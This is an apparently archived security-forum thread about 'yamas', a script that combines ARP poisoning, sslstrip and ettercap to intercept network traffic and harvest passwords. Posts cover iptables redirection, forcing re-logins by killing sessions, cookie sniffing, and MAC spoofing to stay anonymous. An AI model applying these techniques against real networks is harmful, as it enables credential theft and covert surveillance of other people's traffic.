I don't know why you would want both to run at the same time. If you get all unencrypted traffic saved, why bother stripping? And even if for some reason you would want the two running, why would they not be able to run concurrently? SSlStrip will take gmail.com and return http. SSL spoofing will(should? maybe test this out?) take https gmailcom and, with the acceptance of the user, return all unencrypted traffic to you. The user still should see HTTPS gmail. Refer to the SE toolkit for similar attacks. The pentesting with metasploit book clearly shows a user with https getting all his traffic read.
Incidentally, on the other side of the fence, check this out. Any help would be greatly appreciated. http://www.backtrack-linux.org/forums/showthread.php?t=46564

blackRock
11-28-2011, 08:17 PM
In lines 413 & 422 you have hardcoded "wlan0".

Is it right?

comaX
11-29-2011, 08:01 AM
I'll check, but if it's the case, it surely is yet again another dev mistake, forgot to replace my interface by the variable... Thanks for reporting !

You were right, it's now fixed !

blackRock
11-29-2011, 03:18 PM
With script running, sites load much much slower. Is it "normal"?

Also, I can't login to drupal based sites (e.g. drupal.org), but I can login to Joomla ones. Does it has to do with sslstrip or something else?

khaos
11-29-2011, 09:54 PM
Hmm I used chrome. So Ok. But I have a question: If our victim goes directly to https://gmail.com (e.g. he types https://) and we set the rule in iptables to get 443-->port of sslstrip... can we sslstrip the victim? Because port 80 is only for HTTP requests. Why we use that port and not 443? Thanks

comaX
11-29-2011, 10:29 PM
Because a request to https is made through port 80, while in standard navigation. But if the request is made through port 443, it's already to late.
As the name sslstrip indicates, it strips the s from https.

I hope that answers the question, if not, tell and I'll try to be more precise.

khaos
11-30-2011, 02:53 PM
I understood. Thanks for the help. Do you know if the problems with ettercap+sslstrip are fixed?

comaX
11-30-2011, 03:42 PM
Yeahp, but you have to patch it or wait for a new release of ettercap. My buddy eric milam took up dev on it and released a patch to correct the bugs. He posted on the forums about it, give it a search ;)
(I'll edit if I remember the post)

comaX
01-27-2012, 07:42 AM
Hi everyone !

Following suggestions I just added Driftnet in Yamas. Nothing much you'll say, and I'll agree ; but since I had quite the number of requests for this and it was a very simple implementation... There it is. Next will be URLsnarf (even though I doubt that is really useful).

@ShadowMaster : how's the MITM protection going ?
I re-read your suggestions, and I really have to find a way to use FakeSSL... So, guys, anyone, a little help would be greatly appreciated !

I see this script is used less than it used to (around 50 times a day now), but I actually think this is great ; it means people actually use it on a regular basis. I hope not to play haxor though...

Cheers !

ShadowMaster
01-27-2012, 01:56 PM
@ShadowMaster : how's the MITM protection going ?
I re-read your suggestions, and I really have to find a way to use FakeSSL... So, guys, anyone, a little help would be greatly appreciated !


Hey comaX! The MiTM protection is going wonderfully. The two minutes a week I have to spend on it in between frantic, feverish h4x1ng in the PWB course really pay off. :p :cool:
I really am ridiculously busy with that course, hopefully, when I finish I'll devote more time to it. But thank you for the interest, it shows I'm not wasting my time.

I AM looking forward to the implementation of FakeSSL, and I noticed the implementation of the padlock favicon. One down, some to go. Thanks. Your script is a wonderful tool.

ShadowMaster
01-29-2012, 09:21 PM
Hey, comaX. Quick Question. I've been using more and more of your script recently and started experimenting with its features. I tried out driftnet, and noticed two problems. One: the window does not shutdown with the rest of your script like the other terms. I know this is not a real problem, but since the rest of the script is so neat, I thought maybe you'd like to keep this the same way, and have it shut down also. Two: the pictures caugt by driftnet are not saved anywhere, nor are we given the option to save them. Any thoughts on how to allow for saving those pics?

comaX
01-30-2012, 03:13 PM
Thanks for reporting ! I've already been told about driftnet not completely shutting down and I intend to fix this, but I haven't had much time lately. As for saving the pictures... Well, I don't know. I firstly put 2 options for driftnet but what I thought would not display images but save them all didn't work out, so I left it at the moment. I intend to dig the subject a little bit more so that it can be achieved though !

Thanks for the feedback, it's always appreciated :)

VulpiArgenti
01-31-2012, 07:46 AM
Hi ShadowMaster, The images are downloaded to /tmp, but driftnet deletes them when it closes. If you click on an image displayed in the xterm window, it will be saved to pwd (/). Or you could browse and sort /tmp before closing driftnet. ComaX, I'm sure this is why you let yamas leave driftnet open ;-)

comaX
02-01-2012, 03:06 PM
You dear sir might have a good point there. I'll check that. Worst-case scenario, I'll force kill with my hack-fu :p
No process ever shall resist my killing techniques !

I'll keep you guys posted !

Edit : well, well, well... I had put the driftnet killing in fast_cleanup() instead of cleanup()...
Now it's fixed, with a "greeting message" =D

By the way, if you find a way to save images, please do share.

TAPE
02-01-2012, 05:08 PM
Regarding saving the images, I had more success with 'tcpxtract', however am not
sure whether this is included in the stock BT5 ..

Might be an option to look into though.

ShadowMaster
02-01-2012, 07:37 PM
comaX, why not grep through the /tmp files and pull out drift-........ or whatever? copy them all into [pwd]/driftnet/ if the users says so? Like the other options...
Also, even thoug I love ascii art, maybe you should update the current header?.. :p :p

VulpiArgenti
02-02-2012, 03:39 AM
Xplico is worth a look too.

comaX
02-02-2012, 06:09 AM
Regarding saving the images, I had more success with 'tcpxtract', however am not
sure whether this is included in the stock BT5 ..

Might be an option to look into though.

It rings a bell, I'll see if it's included or not. Thanks for the suggestion !


comaX, why not grep through the /tmp files and pull out drift-........ or whatever? copy them all into [pwd]/driftnet/ if the users says so? Like the other options...
Also, even thoug I love ascii art, maybe you should update the current header?..

I thought about that... And was thinking that before "killall driftnet" I should add something like "cp /tmp/driftnet/* /anydir".
That should do the trick right ?
And it's funny you should mention the header, I feel like changing too !


Xplico is worth a look too.
I'll give it one then !

Thank you guys !

I'll probably push an update today :)

VulpiArgenti
02-02-2012, 07:30 AM
"cp /tmp/driftnet/* /anydir" Should be: cp /tmp/driftnet* /anydir

I know you'd have worked it out - thought I would save you the trouble http://www.backtrack-linux.org/forums/images/smilies/smile.png

comaX
02-02-2012, 08:02 AM
It wasn't a mistake, I planned on saving temp files to /tmp/driftnet/ so I could just select everything in the folder. But you are right, since the names all begin with "driftnet", it's simpler your way, and it makes it useless to create another folder.

Since both are valid, I decided to use driftnet *and* tcpxtract (that is way better imho, segmentation faults apart). The user can choose !

I hardcoded the destination folder as /root/capture_$(date +%d%m%y). What do you think about that ?

I also changed the ASCII ;)

Edit : oh, by the way, Xplico doesn't seem to be present for me (xplico: command not found), so I didn't dig much...

Snayler
02-02-2012, 08:34 AM
AFAIK, Xplico needs to be installed first.

comaX
02-02-2012, 09:26 AM
It's in fact already installed under /opt/xplico/bin/xplico, but there are no symlinks for it. I however don't understand what it does nor what is should do... And there is no man entry for it. If someone could give me a little explanation, I'd be glad !
(Yeah I googled it... but a simple user-point-of-view and how it could be used would be nice ! )

Snayler
02-02-2012, 09:53 AM
It's in fact already installed under /opt/xplico/bin/xplico, but there are no symlinks for it. I however don't understand what it does nor what is should do... And there is no man entry for it. If someone could give me a little explanation, I'd be glad ! (Yeah I googled it... but a simple user-point-of-view and how it could be used would be nice ! ) Thanks for the pointer. Then it's a question of creating a symlink inside the /bin folder. From what I remember from 1/2 years ago (when I first/last used the app), it extracts data from a capture file (maybe also from a real-time capture, not sure). Data can be images, http contents, e-mails, sound files,...

ShadowMaster
02-02-2012, 10:39 AM
Xplico seems to be completely stand-alone. I'm not sure how you would allow for the automation that the rest of the script thrives on...

comaX
02-02-2012, 11:08 AM
Yeahp, from what I read on the internet about it, it's nice to have it to analyse further packets captures but I don't see how it would be relevant here. Anyway, it's always nice to have propositions of some tool.

What's your take on urlsnarf ? I don't quite see the point of having a list of GET HTTP blah blah www.mywebsite.com/folder/ressource.ext

Snayler
02-02-2012, 06:09 PM
What's your take on urlsnarf ? I don't quite see the point of having a list of GET HTTP blah blah www.mywebsite.com/folder/ressource.ext It's always interesting to demonstrate that an attacker can study your browsing habits and use that knowledge to exploit a computer/steal passwords (dns poisoning/phising/etc...).

VulpiArgenti
02-02-2012, 06:26 PM
Xplico is an interesting (and powerful) tool. It's best run on a dump (live capture mode is not as useful). It's easiest used through its web GUI so I agree wouldn't integrate well with yamas - just mentioned it while we were discussing image extraction.

comaX
02-02-2012, 06:50 PM
It's always interesting to demonstrate that an attacker can study your browsing habits and use that knowledge to exploit a computer/steal passwords (dns poisoning/phising/etc...).
I certainly agree with you but you'll find urlsnarf informations in sslstrip's logs... So it doesn't bring anything new, imo.


Xplico is an interesting (and powerful) tool. It's best run on a dump (live capture mode is not as useful). It's easiest used through its web GUI so I agree wouldn't integrate well with yamas - just mentioned it while we were discussing image extraction.
All right, thanks, I thought you mentionned it for yamas, not as general knwoledge. But it makes more sense this way and it sure seems to be a nice tool ! I'll try to have a go at it when I figured how to launch it :p

Snayler
02-02-2012, 07:50 PM
I certainly agree with you but you'll find urlsnarf informations in sslstrip's logs... So it doesn't bring anything new, imo. I'll be honest, I never looked inside a sslstrip log, so I don't know what's inside it. Have you compared the results from both tools, to check if they match?

comaX
02-03-2012, 05:16 AM
Sslstrip logs contains pretty much everything that happens on the network. You'll get a load of crap, headers, requests, etc. In urlsnarf, you only get the requests like GET. So, it's a little more readable than sslstrip logs, but to obtain the same result the parsing would be easy.
urlsnarf :

192.168.1.3 - - [23/Jul/2008:15:41:52 -0700] "GET http://suggestqueries.google.com/complete/search?output=firefox&client=firefox&hl=en-US&q=sguil HTTP/1.1" - - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1"

sslstrip

011-11-17 15:27:50,528 Resolved host successfully: clients2.google.com -> 209.85.147.113
2011-11-17 15:27:50,529 Sending request via HTTP...
2011-11-17 15:27:50,573 HTTP connection made.
2011-11-17 15:27:50,573 Sending Request: GET /service/update2/crx?
2011-11-17 15:27:50,574 Sending header: accept-charset : windows-1252,utf-8;q=0.7,*;q=0.3
2011-11-17 15:27:50,574 Sending header: connection : keep-alive
2011-11-17 15:27:50,574 Sending header: accept-language : fr,en-US;q=0.8,en;q=0.6
2011-11-17 15:27:50,574 Sending header: host : clients2.google.com
2011-11-17 15:27:50,574 Sending header: user-agent : Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2

Ok, sslstrip logs are more verbose, but if you do something like cat sslstrip.log | grep "Resolved host successfully:", you should get the browsed websites...

Example on one of my logs with egrep -i -a -e "Resolved host successfully:" /root/sslstrip.log


2011-11-17 15:27:22,486 Resolved host successfully: safebrowsing.clients.google.com -> 173.194.67.101
2011-11-17 15:27:22,731 Resolved host successfully: safebrowsing-cache.google.com -> 209.85.227.139
2011-11-17 15:27:26,931 Resolved host successfully: whos.amung.us -> 67.202.94.93
2011-11-17 15:27:28,606 Resolved host successfully: www.facebook.com -> 69.171.242.14
2011-11-17 15:27:31,875 Resolved host successfully: 0-74.channel.facebook.com -> 66.220.145.41
2011-11-17 15:27:47,956 Resolved host successfully: whos.amung.us -> 67.202.94.93

And it wouldn't be too hard to keep only certain columns with awk or cut...

tuxnator
02-08-2012, 05:29 PM
Make the Xplico run into BackTrack 5 is a real pain in the ass. When I wanted to try it, after losing some hours in vain, I only downloaded the VM from Xplico's website.

comaX
02-15-2012, 06:05 AM
Hi guys ! Quick post to tell you there were updates made ! It should be easier to run it on other linux platforms, and some stuff here and there.

As stated in the "message of the day" feature, I'm dropping urlsnarf since I didn't get much positive feedback about it.
With that said, if you guys really want something that'll show the browsed websites, I can do it just like I showed you two posts before this one. Tell me what you'd like !
Cheers !

ShadowMaster
02-15-2012, 01:07 PM
Hi guys ! Quick post to tell you there were updates made ! It should be easier to run it on other linux platforms, and some stuff here and there.

As stated in the "message of the day" feature, I'm dropping urlsnarf since I didn't get much positive feedback about it.
With that said, if you guys really want something that'll show the browsed websites, I can do it just like I showed you two posts before this one. Tell me what you'd like !
Cheers !
It may be a prob with my script, but when like I always do: by typing in yamas in the term, I get "No update available Script is installed", but the message of the day changes to the url snarf thing. I'm assuming that's not normal...
Also, you may want to add a -u feature in the script, because when I only want to update, not run it, I still have to go through the whole rigmarole of settings options, and cleaning up. -u would be so much more convenient. Thanks.

comaX
02-15-2012, 03:38 PM
Noted for the -u option, I'll work on that !
With that said, I myself have to update the same way you guys do. And when I just need to update it, I wait for the message to be displayed and then ctrl+c.
But yeah, an update option would be better :)
And yeahp, it's normal that the message of the day changes without an update. It's curled from my website on launch. You can deactivate that with the silent mode (-s).

ShadowMaster
02-15-2012, 03:43 PM
Noted for the -u option, I'll work on that !
With that said, I myself have to update the same way you guys do. And when I just need to update it, I wait for the message to be displayed and then ctrl+c.
But yeah, an update option would be better :)
And yeahp, it's normal that the message of the day changes without an update. It's curled from my website on launch. You can deactivate that with the silent mode (-s).
I get the message, that's fine. What I meant was: I got the NEW message, but NOT the NEW script...
Isn't it supposed to update?... I'm still using the last revision, and it says no update is available. feb 2.

comaX
02-16-2012, 05:15 AM
Ouch... I must have **** up somewhere along the way. I'll look into it, thanks for reporting !

ShadowMaster
02-16-2012, 10:31 AM
Of course I report. I love this tool, I want the newest version. :)
That being said I'm not clear on the syntax to use fakessl? I see the option to add the favicon, I see the option to use ettercap, but where do I add in the fake ssl? Perhaps, if -e has been selected, you could make that one of the additional options. To use sslstrip for most, but for some websites/browsers, allow for fakessl?

comaX
02-16-2012, 01:53 PM
Ok, the update glitch should be fixed !
For the FakeSSL, I'm still trying to figure it out, and I don't have much time these days to do such "important" tests.
And since I need to do some searching and all, it's not for right now. But it'll come eventually ;)

Off-topic : there is this site hackershandbook.org that make people pay to access "hacker knowledge", use THE "Anonymous" as identity to make money, and they seem to have included a part on yamas since I saw referral traffic from them. I blocked their users from seeing my site, but it's not enough.
Such a behaviour just makes me sick, so if you guys don't know what to do, they have a Facebook, Twitter and Android App (paying, of course...) that are just waiting for insults :) /Off-topic

ShadowMaster
02-16-2012, 01:59 PM
root@bt:~# yamas
No update available
Script is installed

run at 2:04 pm est....

I downloaded the script from your website and reinstalled. I'm now running version 20120212 instead of 20120202. I'm hoping that that is the latest version, because I still get no update available.

comaX
02-17-2012, 06:10 AM
Yup, it is !

wewe73
04-07-2012, 04:51 PM
hey comaX,

i used your script and i have to say it's more stable and afective then ettercap! easy to download and install and i got it working with in a minuts, not like wise every time i fix something, somthing eles come's up, so thank you very much for your script,

merci beaucoup :-)

ericmilam
04-08-2012, 02:54 AM
hey comaX,

i used your script and i have to say it's more stable and afective then ettercap! easy to download and install and i got it working with in a minuts, not like wise every time i fix something, somthing eles come's up, so thank you very much for your script,

merci beaucoup :-)

With all due respect to ComaX and his awesome script and hard work. (ComaX you know I'm a huge fan/supporter) wewe73, I must break words with you about the stability and effectiveness of ettercap. Do tell? What are your issues, perhaps something that could be fixed?

If there are issues with ettercap, please let us know and we'd be happy to research, address, fix them.

Best regards,
J0hnnyBrav0

wewe73
04-08-2012, 04:11 PM
Hi J0hnnyBrav0

Firt of all I must thank you for easy-creds, itís an awesome toll and I love it! Much appriciated,
And thank you for interests and offer your help with ettercap,
First issue with ettercap-gtk is when I was scanning for hosts it shut down!
After a day searching the forum and goggling I managed to find a fix for that,
had a problem with arp.poisoning, when I check if the poisoning had a success, it says no poisoning between the 192.168.X.X .> 192.168.X.XX that has been fixed too
now the problem is ettercap-gtk doesnít show anything like logins and passwds!
My command was simple just ettercap-gtk and of course I have edit etter.conf and uncommented both lines in iptables for linux to be able to read it, am confused to be honest, it could be me not ettercap after all !

your help will be really appreciated,

Kind Regards
issak

ira787
04-08-2012, 07:26 PM
This script is getting very close to perfection! Thank you!!

I added a few lines to mine, just to anonymize for fun:

ifconfig eth0 down
sleep 2
macchanger -e eth0
ifconfig eth0 up
dhclient eth0
sleep 1
These take eth0 offline, then spoof the mac, keeping the same vendor, then reconnects eth0 to the network.

whjte
04-09-2012, 03:50 AM
Hello. First of all thanks for the great script you're sharing with us. I just have one question: how can i catch auto-logging enabled passwords with YAMAS? I mean when the user has checked the "remmember me" option in his browser?
Thanks in advance.

whjte
04-09-2012, 03:50 AM
Hello. First of all thanks for the great script you're sharing with us. I just have one question: how can i catch auto-logging enabled passwords with YAMAS? I mean when the user has checked the "remmember me" option in his browser?
Thanks in advance.

comaX
04-09-2012, 04:00 AM
This script is getting very close to perfection! Thank you!!

I added a few lines to mine, just to anonymize for fun:

ifconfig eth0 down
sleep 2
macchanger -e eth0
ifconfig eth0 up
dhclient eth0
sleep 1
These take eth0 offline, then spoof the mac, keeping the same vendor, then reconnects eth0 to the network.

That's a good idea ! I intentionally didn't put something like that because I expect people needing anonymity to do what is necessary to be anonymous... Anyway, thanks for sharing !


Hello. First of all thanks for the great script you're sharing with us. I just have one question: how can i catch auto-logging enabled passwords with YAMAS? I mean when the user has checked the "remmember me" option in his browser?
Thanks in advance.

Well, you cannot ! Because the password isn't transmitted in this case, but a cookie is. You can sniff cookies and use them with Wireshark for instance.
With that said, sslstrip has an option (-k) that is enabled in yamas that is supposed to kill sessions by preventing cookies to be sent, hence forcing reauthentication, that then can be sniffed.

Thanks to all you guys for your posts ;)

ericmilam
04-09-2012, 10:34 AM
Hi J0hnnyBrav0

Firt of all I must thank you for easy-creds, itís an awesome toll and I love it! Much appriciated,
And thank you for interests and offer your help with ettercap,
First issue with ettercap-gtk is when I was scanning for hosts it shut down!
After a day searching the forum and goggling I managed to find a fix for that,
had a problem with arp.poisoning, when I check if the poisoning had a success, it says no poisoning between the 192.168.X.X .> 192.168.X.XX that has been fixed too
now the problem is ettercap-gtk doesnít show anything like logins and passwds!
My command was simple just ettercap-gtk and of course I have edit etter.conf and uncommented both lines in iptables for linux to be able to read it, am confused to be honest, it could be me not ettercap after all !

your help will be really appreciated,

Kind Regards
issak

Are you running the latest version? We fixed a lot of that. And GTK sucks anyway learn to use the CLI. That sounds like an old issue to me, but I have seen it for Win7 which isn't supported.

Latest version is 0.7.4.1-Lazarus.

ShadowMaster
04-09-2012, 11:55 AM
comaX, I don't know whether you have updated your script beyond the feb 12 version, mainly because I have yet to confirm the update bug being fixed because I still get no updates available. Are there any? Like the allowing of anonymity as a default? If yes, then the bug still exists... If not, can you add a -u like we talked about, or the anonymity which seems cool, so that I can confirm the bug being gone? Thanks :)

wewe73
04-09-2012, 12:21 PM
double post

wewe73
04-09-2012, 12:21 PM
Hi, hope you well and thanks for your reply.

my laptop is win7 and yes am running it on BT5-R2 KDK-32bit Gnome 32bit on VM and 64bit HDD install, so i assume it's the latest version, I never run ettercap on win7 but i use win7 as a victim, does ettercap doesn't work against win7 ? i think am wrong :-)
anyways i thank you so much for your help and definitely will take your advice on board and start leaning to use CLI, and i will post somewhere my feedback, am sure i'v seen a post somewhere on the forum mansion CLI, i think it's the best to lean and start make use of the keyboard :-)

thanks

sorry for the double post, and sorry to compaX to use his thread to discuss ettercap, sorry comaX again:o

comaX
04-10-2012, 09:16 AM
comaX, I don't know whether you have updated your script beyond the feb 12 version, mainly because I have yet to confirm the update bug being fixed because I still get no updates available. Are there any? Like the allowing of anonymity as a default? If yes, then the bug still exists... If not, can you add a -u like we talked about, or the anonymity which seems cool, so that I can confirm the bug being gone? Thanks :)

Oh, my. I don't know what the hell I've done, but there no longer is a version number in the script... I'll check this ASAP. No wonder you didn't get updates... To know if you have the last one, you can check if you have the logs in a directory with the date. Or just grab the lastest from my website : http://comax.fr/yamas/bt5/yamas.sh
For the anonymity stuff, I must have said things not clearly : it is on purpose that there ISN'T one !

Thanks for pointing the issue out. As for the update stuff, I believe I did something related to it, but it's been a while I didn't work on the code and
my memory is that of a goldfish !


Hi, hope you well and thanks for your reply.

my laptop is win7 and yes am running it on BT5-R2 KDK-32bit Gnome 32bit on VM and 64bit HDD install, so i assume it's the latest version, I never run ettercap on win7 but i use win7 as a victim, does ettercap doesn't work against win7 ? i think am wrong :-)
anyways i thank you so much for your help and definitely will take your advice on board and start leaning to use CLI, and i will post somewhere my feedback, am sure i'v seen a post somewhere on the forum mansion CLI, i think it's the best to lean and start make use of the keyboard :-)

thanks

sorry for the double post, and sorry to compaX to use his thread to discuss ettercap, sorry comaX again:o

No problem ! A good way to see it is that it bumps the thread ;)

chip28
04-30-2012, 02:23 AM
Hey Thanks for the terrific script, works flawlessly for me.
I added the same as Ira787 for the macchanging business, so that would be a useful thing to add, but I understand the reasoning behind not implementing it. A really useful addition that you could add would be some sort of hostname/ip tagging for the user/pass output.

That way when you scrape a user/password it would let you know where you got it from, example:

Website = twitter.com
Login = <username>
Password = <password>
Host = chip28.cz.eu <- fqdn

or if it would separate the log into several logs, one per machine, that would work too!

Thanks again!
Chip28

comaX
04-30-2012, 08:24 AM
First, my apologies to all. It has been exhausting weeks for me lately and I didn't do shit. I'll try to do what should be done ASAP but I'm having midterm(?) exams for the next two weeks, so I might not have so much time.



Hey Thanks for the terrific script, works flawlessly for me.
I added the same as Ira787 for the macchanging business, so that would be a useful thing to add, but I understand the reasoning behind not implementing it. A really useful addition that you could add would be some sort of hostname/ip tagging for the user/pass output.

That way when you scrape a user/password it would let you know where you got it from, example:

Website = twitter.com
Login = <username>
Password = <password>
Host = chip28.cz.eu <- fqdn

or if it would separate the log into several logs, one per machine, that would work too!

Thanks again!
Chip28

I thought about that at the very begining of the script but turned out it's impossible to do :
- the parsing is already very heavy CPU-wise
- it's complicated to parse more
- adding the website was hard as fu*ck
- Sslstrip logs don't differentiate between local hosts (afaik), so I can't do anything about that. If you're really talking about FQDN, then it's pretty much the webiste, or am I beside the point ?

On a non-related topic : I tried it on the last Ubuntu (12.04) and everything seems to work, so I don't get why people want me to do an "Ubuntu version". (Not that you BT users ask this, but in case someone out of the community reads this...)

Cheers !

voidnecron
05-08-2012, 02:56 PM
Sorry to dig up such an old post, but I just started using it and found the following things 'weird':

Do you want to keep the whole log file for further use or shall we delete it? (Y=keep)
You might want to rename 'keep' to 'save' and add 'N=don't save' or something, just to clearify.

Same goes for this
Do you want to save passwords to a file? (Y=keep)

During startup it checks if the script is installed to /usr/bin and at my setup it IS installed, however it came up with this:
This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)
y
cp: `/usr/bin/yamas' and `/usr/bin/yamas' are the same file
Script installed !
You might want to recheck this check.

Great stuff futhermore, thanks for this!

voidnecron
05-08-2012, 02:57 PM
Sorry to dig up such an old post, but I just started using it and found the following things 'weird':

Do you want to keep the whole log file for further use or shall we delete it? (Y=keep)
You might want to rename 'keep' to 'save' and add 'N=don't save' or something, just to clearify.

Same goes for this
Do you want to save passwords to a file? (Y=keep)

During startup it checks if the script is installed to /usr/bin and at my setup it IS installed, however it came up with this:
This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)
y
cp: `/usr/bin/yamas' and `/usr/bin/yamas' are the same file
Script installed !
You might want to recheck this check.

Great stuff futhermore, thanks for this!

cabo81
06-21-2012, 05:31 PM
Hi group

This is my first post. First I want to thank to ComaX for this incredible script.

This is my question. I've been playing with the script and works for yahoo, hotmail and facebook. But not working with gmail. There's any workaround for retrieving the gmail passwords?

I saw nothing on forum.

Thanks in advance.

comaX
06-22-2012, 12:39 AM
It's been a while I didn't test it, so the parser might be out of date but I doubt it. Gmail enforces https connections, so by definition, sslstrip can't get anything from it. I'll test when I have time (probably early july I think...) but I'm pretty sure it all comes down to this.

cabo81
06-22-2012, 03:48 PM
Thanks for your answer. I'll be waiting and continue to testing

zatixiz
06-23-2012, 11:39 AM
Really good script ComaX, i've used it alot and it never seems to fail me!
There were some small bugs last time I used it but nothing important really, keep the good work up! :)

ShadowMaster
06-24-2012, 11:24 AM
gmail defaults to https and on most browser cant be worked around. Sorry...

comaX
06-27-2012, 01:01 PM
gmail defaults to https and on most browser cant be worked around. Sorry...

Thanks for confirming ;) Other sites should take the example and do the same. At least the important website like banks, FB, and the like. I find it intolerable that an online banking service doesn't require and MD5 hash to be transmitted on an https-only connection ; enabling anyone with a computer to hack about.

ShadowMaster
06-27-2012, 01:33 PM
Very true. btw comaX can you do some small update to confirm the fix of the updating bug I found. THere have been no updates as of then, therefore I can't confirm...

comaX
06-27-2012, 01:55 PM
Yes I remember you talking about that, ans I checked my code but didn't notice anything weird or not working during tests... Could you tell me again what was wrong and if it still is so that I can check specifically for that ? I now have time on my hands, so I should be more active in case of requests and all !

Cheers !

ShadowMaster
06-27-2012, 02:16 PM
It said no update was available yet there were several updates that should have been. So it was improperly connecting or something. It got the MoTD but not the new update...
You said it was fixed, but I was unable to confirm.

comaX
06-27-2012, 02:44 PM
It said no update was available yet there were several updates that should have been. So it was improperly connecting or something. It got the MoTD but not the new update...
You said it was fixed, but I was unable to confirm.

Oh yeah, that was because of a bad cron table on my server that didn't update the "version" file correctly. Now it should be all good !

ShadowMaster
06-27-2012, 02:59 PM
Cool. Thanks.

hannah
06-28-2012, 07:35 AM
Hi comaX. many thanks for this wonderful script. I have read through all 18 pages of comments and also had watched the video. I have downloaded and installed the script in my machine. Everything seems to run smooth however when I login to twitter / hotmail (I am manually typing the login / password) I do not get these captured. Please note that I have also use yamas -e option too. I am sure there is some settings in my machine which needs to be fixed but I just do not know which needs fixing.

My Machine:
BackTrack 5 R2 Gnome 64 bit : Linux bt 3.2.6 x86_64 GNU/Linux : HDD installed.

Note the messages as I launch yamas



[+] Cleaning iptables
[-] Cleaned.

[+] Activating IP forwarding...
[-] Activated.

[+] Configuring iptables...
To what port should the traffic be redirected to? (default = 8080)

Port 8080 selected as default.

From what port should the traffic be redirected to? (default = 80)

Port 80 selected as default.


Traffic from port 80 will be redirected to port 8080
[-] Traffic rerouted

[+] Activating sslstrip...
Choose filename to output : (default = yamas)

Sslstrip will be listening on port 8080 and outputting log in /tmp/yamas.txt

sslstrip 0.9 by Moxie Marlinspike running...

[-] Sslstrip is running.


[+] Activating ARP cache poisoning...

Gateway : 192.168.1.1 Interface : wlan0

Enter IP gateway adress or press enter to use 192.168.1.1.

192.168.1.1 selected as default.


What interface would you like to use? It should match IP gateway as shown above. Press enter to use wlan0.

wlan0 selected as default.


We will target the whole network as default. You can discover hosts and enter IP(s) manually by entering D.
Press enter to default.


Targeting the whole network on 192.168.1.1 on wlan0 with ARPspoof
[-] Arp cache poisoning is launched. Keep new window(s) running.

Attack should be running smooth, enjoy.



Attack is running. You can :
1. Rescan network.
2. Add a target (useless if targeting whole network).
3. Display ASCII correspondence table.
4. Real-time parsing...
5. Misc features.
6. Quit properly.

Enter the number of the desired option.

Please note the interface and gateway ip are correct.

Many thanks again.

ShadowMaster
06-28-2012, 08:11 AM
Try using mon0 after setting up wlan0 to run in monitor mode with airmon-ng.

hannah
06-28-2012, 04:24 PM
Try using mon0 after setting up wlan0 to run in monitor mode with airmon-ng.

Hey thanks but how would being mon0 work. mon0 is to sniff traffic and it cannot associate with an AP. In order to sniff logins/passwords you need to be MITM and mon0 cannot do that.

ShadowMaster
06-28-2012, 04:31 PM
Since when can mon0 not associate with an AP? All monitor mode does is enable the ability to sniff raw packet frames from the ether. This is the first I ever heard about monitor mode decreasing functionality...

comaX
06-29-2012, 04:55 AM
Hi comaX. many thanks for this wonderful script. I have read through all 18 pages of comments and also had watched the video. I have downloaded and installed the script in my machine. Everything seems to run smooth however when I login to twitter / hotmail (I am manually typing the login / password) I do not get these captured. Please note that I have also use yamas -e option too. I am sure there is some settings in my machine which needs to be fixed but I just do not know which needs fixing.

My Machine:
BackTrack 5 R2 Gnome 64 bit : Linux bt 3.2.6 x86_64 GNU/Linux : HDD installed.

Please note the interface and gateway ip are correct.

Many thanks again.

Hi, thanks for reading it all before posting, even I wouldn't go this far. You say it doesn't work for hotmail / twitter. Does it work for others ? Have you tried in private browsing mode to avoid anything being transmitted via cookies for instance ? Did you make sure you were not on an https connection ? Some sites like gmail enforce this type of connection, rendering sslstrip/ettercap useless.
Since you're using ettercap, have you tried using sslstrip ?

As for the mon0/wlan0, it's not really relevant here. Indeed I don't think you can associate with an AP in monitor mode, but what you can do is being connected with wlan0 to an AP, and have a pseudo-interface mon0 in monitor mode. In a nutshell, mon0 itself doesn't connect, but the wireless interface can be connected, and in monitor mode.
But once again, I don't really see how that is relevant here, so unless you guys explain in more details, let's just forget that.

I have some more ideas, but more troubling too, so I'll wait for your feedback before conjecturing horrid stuff :p

//

I'll risk getting my ass kicked because it's absolutely irrelevant to Backtrack, but there is this project I started that needs help growing : http://msimdb.comax.fr It's a database of movie quotes in music. It suffers greatly from content and anything non-metal. So if you guys are willing to help in anyway you can think of, I'll be super glad ! Mods, sorry for doing this.

hannah
06-29-2012, 07:37 AM
Hi, thanks for reading it all before posting, even I wouldn't go this far. You say it doesn't work for hotmail / twitter. Does it work for others ? Have you tried in private browsing mode to avoid anything being transmitted via cookies for instance ? Did you make sure you were not on an https connection ? Some sites like gmail enforce this type of connection, rendering sslstrip/ettercap useless.
Since you're using ettercap, have you tried using sslstrip ?


BTW: I am running version 20120213

First of all I have tried both option with yamas, I mean the default is with sslstrip and with yamas -e (which activates ettercap). I now have used a browser with all cookies cleared. Have tried https and http authentication site.

Password box does not show me anything.

I am sure this script works as it's working with everyone else as it seems. Is there a debug option in this script. Help file does not say of there is any. Any idea will be appreciated.

@ShadowMaster
Now in regards to mon0 issue, what I meant that you cannot get ip address from an AP through mon0. Hence no gateway and this script is not going to work. Please correct me if I am wrong here.

Always willing to learn.

Regards

ShadowMaster
06-29-2012, 08:55 AM
@comaX Ideas are always welcome, no matter how troubling they may be.

@hannah Why not do what comaX said, which is what I meant, just in more detail. Basically associate with wlan0 and create a pseudo-interface mon0? Also, setting your own default gateway is really not hard... route gw {ip} or some thing very similar, don't remember off hand sorry. I'd be more worried about the no ip, which is also easy to set...

comaX
06-29-2012, 11:05 AM
@comaX Ideas are always welcome, no matter how troubling they may be.

The troubling idea would be that they changed the authentication process and I might have to change the parser, which was a pain in the arse back then, and now that I don't have everything in mind, I fear it would be again, with the necessity to first understand what I wrote back then... So yeah, it's troubling :p

@Hannah : you didn't tell me if it worked for other sites or not. Are you using a local connection page maybe ? (fr.msn.com ; us.msn.com... I just made them up, but you know what I mean)

ShadowMaster
06-29-2012, 11:16 AM
